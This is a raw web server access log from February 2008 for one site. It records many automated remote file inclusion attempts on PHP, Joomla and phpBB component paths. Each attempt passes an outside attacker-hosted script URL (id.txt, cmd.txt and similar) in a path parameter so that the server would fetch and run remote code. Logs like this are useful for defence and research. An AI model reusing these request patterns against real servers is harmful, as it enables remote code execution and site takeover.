203.86.232.194 - - [17/Feb/2008:04:22:46 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:04:23:14 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://spyd0x.olympe-network.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:04:23:14 -0800] "GET /index.php?sourcedir=http://spyd0x.olympe-network.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:04:23:14 -0800] "GET /logs/index.php?sourcedir=http://spyd0x.olympe-network.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /logs/access_080120.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22path_to_root%22&u=www.dmulk.com/logs/access_080120.log&w=path_to_root&d=MrJoFnDuQP6Q&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.claibon.co.uk/main/services/application.cfm%22%20%3Ewww.claibon.co.uk/main/services/application.cfm%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20Request.Path_To_Root%20=%20Trim(%22../%22%20&%20Request.Path_To_Root)>%20<cfinclude%20template=%22 HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /logs/access_080120.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22path_to_root%22&u=www.dmulk.com/logs/access_080120.log&w=path_to_root&d=MrJoFnDuQP6Q&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.claibon.co.uk/main/services/application.cfm%22%20%3Ewww.claibon.co.uk/main/services/application.cfm%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20Request.Path_To_Root%20=%20Trim(%22../%22%20&%20Request.Path_To_Root)>%20<cfinclude%20template=%22 HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /config.php?path_to_root=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /logs/access_080120.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22path_to_root%22&u=www.dmulk.com/logs/access_080120.log&w=path_to_root&d=MrJoFnDuQP6Q&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.claibon.co.uk/main/services/application.cfm%22%20%3Ewww.claibon.co.uk/main/services/application.cfm%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20Request.Path_To_Root%20=%20Trim(%22../%22%20&%20Request.Path_To_Root)>%20<cfinclude%20template=%22 HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:04:23:40 -0800] "GET /logs/access_080120.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22path_to_root%22&u=www.dmulk.com/logs/access_080120.log&w=path_to_root&d=MrJoFnDuQP6Q&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.claibon.co.uk/main/services/application.cfm%22%20%3Ewww.claibon.co.uk/main/services/application.cfm%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20Request.Path_To_Root%20=%20Trim(%22../%22%20&%20Request.Path_To_Root)>%20<cfinclude%20template=%22 HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:04:23:48 -0800] "GET /index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.155.2 - - [17/Feb/2008:04:23:53 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:04:24:03 -0800] "GET /logs/access_080120.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:24:45 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:24:45 -0800] "GET //skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:24:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [17/Feb/2008:04:25:03 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.55.146.38 - - [17/Feb/2008:04:25:03 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:25:21 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.195.109.3 - - [17/Feb/2008:04:25:41 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:04:25:44 -0800] "GET /index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.195.109.3 - - [17/Feb/2008:04:25:51 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
158.195.109.3 - - [17/Feb/2008:04:25:55 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.191.42 - - [17/Feb/2008:04:25:56 -0800] "GET /logs/access_080103.log/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [17/Feb/2008:04:25:56 -0800] "GET /!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [17/Feb/2008:04:25:56 -0800] "GET /logs/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [17/Feb/2008:04:25:57 -0800] "GET /!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.83.76 - - [17/Feb/2008:04:26:54 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.83.76 - - [17/Feb/2008:04:26:54 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.83.76 - - [17/Feb/2008:04:26:55 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:04:27:17 -0800] "GET /index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.236 - - [17/Feb/2008:04:27:29 -0800] "GET /logs/access_080128.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:04:27:40 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:04:27:40 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:04:28:41 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:04:28:55 -0800] "GET //codebb/lang_select?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:04:28:56 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:29:19 -0800] "GET /logs/access_071230.log//index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:29:19 -0800] "GET /logs//index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:04:29:26 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.7.68 - - [17/Feb/2008:04:29:27 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:04:29:30 -0800] "GET /logs/access_080118.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [17/Feb/2008:04:29:31 -0800] "GET //codebb/lang_select?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:04:29:34 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:04:29:35 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.109.10.21 - - [17/Feb/2008:04:29:43 -0800] "GET /logs/access_080118.log/%22SQueryhttp://www.oldcommonwealth.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.109.10.21 - - [17/Feb/2008:04:29:43 -0800] "GET /%22SQueryhttp://www.oldcommonwealth.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.109.10.21 - - [17/Feb/2008:04:29:44 -0800] "GET /logs/%22SQueryhttp://www.oldcommonwealth.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.191.42 - - [17/Feb/2008:04:29:44 -0800] "GET /logs/access.log/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:30:13 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:30:13 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:30:14 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:04:30:14 -0800] "GET //reports/%3Cwbr%20/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:04:30:14 -0800] "GET /logs//reports/%3Cwbr%20/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.109.10.21 - - [17/Feb/2008:04:30:54 -0800] "GET /logs/access_080122.log/%22SQueryhttp://www.oldcommonwealth.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:04:31:31 -0800] "GET /?mosConfig_absolute_path=http://www.image1hosting.com/test.txt??? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.26.152 - - [17/Feb/2008:04:31:35 -0800] "GET /retreat1/webcam/?M=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:04:31:36 -0800] "GET /logs/?mosConfig_absolute_path=http://www.image1hosting.com/test.txt??? HTTP/1.1" 200 34972 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:32:17 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:32:22 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:32:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:32:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.148 - - [17/Feb/2008:04:32:27 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:04:32:37 -0800] "GET //reports/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:04:32:37 -0800] "GET /logs//reports/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:04:32:40 -0800] "GET /logs/access_080126.log/modify.php?dir_module=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:04:32:41 -0800] "GET /modify.php?dir_module=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:04:32:41 -0800] "GET /logs/modify.php?dir_module=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:04:34:09 -0800] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:04:34:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:04:34:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:04:34:53 -0800] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:04:34:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:04:34:53 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:34:53 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:04:35:06 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:35:31 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:35:31 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:35:39 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:35:39 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:04:35:47 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:04:36:53 -0800] "GET /logs/access_071230.log//index.php?p=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:04:36:54 -0800] "GET //index.php?p=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:04:36:54 -0800] "GET /logs//index.php?p=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.132.2 - - [17/Feb/2008:04:36:59 -0800] "GET /logs/access_080118.log/components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.132.2 - - [17/Feb/2008:04:37:01 -0800] "GET /components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.132.2 - - [17/Feb/2008:04:37:06 -0800] "GET /logs/components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.219.245 - - [17/Feb/2008:04:37:10 -0800] "GET /logs/access_080131.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [17/Feb/2008:04:37:13 -0800] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.210.83.76 - - [17/Feb/2008:04:37:27 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:04:37:28 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:04:37:35 -0800] "GET /!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:37:51 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:04:39:02 -0800] "GET /logs/access_080126.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:04:39:03 -0800] "GET /logs/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:39:03 -0800] "GET //index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [17/Feb/2008:04:39:37 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:40:02 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:40:02 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:40:04 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.132.2 - - [17/Feb/2008:04:40:55 -0800] "GET /components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:04:42:21 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
